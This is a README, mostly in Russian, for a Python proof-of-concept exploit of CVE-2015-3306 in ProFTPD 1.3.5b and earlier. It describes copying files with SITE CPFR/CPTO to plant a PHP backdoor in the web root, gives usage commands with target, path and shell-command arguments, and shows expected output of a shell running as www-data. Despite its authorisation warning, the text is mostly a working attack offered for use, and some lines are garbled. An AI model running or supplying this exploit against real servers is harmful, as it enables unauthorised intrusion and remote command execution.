
Этот репозиторий содержит Python proof-of-concept (PoC) эксплойт для CVE-2015-3306
⚠️ Предупреждение: Используйте это только против систем, которыми вы владеете или на тестирование которых у вас есть явное разрешение. Несанкционированная эксплуатация незаконна.
Mohamed EL-KHAROUATI
CVE-2015-3306 — это уязвимость обхода каталога в ProFTPD 1.3.5b и более ранних версиях. Этот эксплойт позволяет копировать произвольные файлы и размещать PHP-бэкдор в веб-корне. Бэкдор может выполнять произвольные shell-команды.
SITE CPFR/CPTO.backdoor.php) в указанном веб-корне.--rcommand.requests (pip install requests)# Run the exploit
python3 exploit.py --rhost <target_ip> --rport <ftp_port> --rpath <web_root_path> --rcommand <shell_command>
# Example:
python3 exploit.py --rhost <target_ip> --rport <targetftp_port> --rpath /var/www/html --rcommand whoami
# Expected Output:
[+] CVE-2015-3306 exploit by Mohamed EL-KHAROUATI
[+] Exploiting <target_ip>
[+] Running Command whoami
[+] Target exploited, accessing shell at http://<target_ip> /backdoor.php
[+] Running whoami: www-data
[+] Done